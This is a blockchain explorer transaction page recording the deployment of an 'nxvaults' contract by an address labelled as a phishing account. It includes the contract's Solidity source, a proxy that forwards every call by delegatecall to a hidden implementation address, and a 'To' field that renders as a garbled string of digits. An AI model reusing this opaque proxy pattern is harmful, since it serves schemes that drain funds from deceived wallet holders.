ETH Price: $2,393.18 (-1.41%)

Transaction Decoder

Block:
19811542 at May-06-2024 02:08:47 PM +UTC
Transaction Fee:
0.00158466393973569 ETH $3.79
Gas Used:
163,235 Gas / 9.707868654 Gwei

Account State Difference:

  Address   Before After State Difference Code
(Titan Builder)
5.134893577650787465 Eth5.135009088596597495 Eth0.00011551094581003
0x48ca9074...65D1CbBc1
0 Eth
Nonce: 0
0 Eth
Nonce: 1
From: 0 To: 63253504459477942482580087128348066165112161224364230577717089883750837963733556514178024771206301198725637075820205018515644299726047197133908970941264356919644902295640427672778404063762321945195079137470188514321118728285416003071066919672054238108679619712137875522232410921630984765412605918462321989945908175776875459593801804389560154043770370388186399298168042172675861307417005765116897136835118858561344943201498420566315106783990142365672634178798205495847273915450686042281879239699311780845872375982345073027593642473509145944038929848122333691519008171203208254752402910382222691312470081495769513146656434795033082349461597576299610163
0x936f708E...efBF27986
(Fake_Phishing328370)
0.056257321975 Eth
Nonce: 0
0.05467265803526431 Eth
Nonce: 1
0.00158466393973569

Execution Trace

nxvaults.60806040( )
  • 0x475524de13f635cbbca065c3b70c35cdeb6125ea.DELEGATECALL( )
    // SPDX-License-Identifier: MIT
    
    pragma solidity >=0.8.13;
    
    contract nxvaults {
        uint256 private ns = 5005;
        fallback(bytes calldata data) payable external returns(bytes memory){
            (bool r1, bytes memory result) = address(0x475524DE13F635CbBcA065C3B70C35cDEb6125ea).delegatecall(data);
            require(r1, "Verification.");
            return result;
        }
    
        receive() payable external {
        }
    
        constructor() {
            bytes memory data = abi.encodeWithSignature("initialize()");
            (bool r1,) = address(0x475524DE13F635CbBcA065C3B70C35cDEb6125ea).delegatecall(data);
            require(r1, "Verificiation.");
        }
    }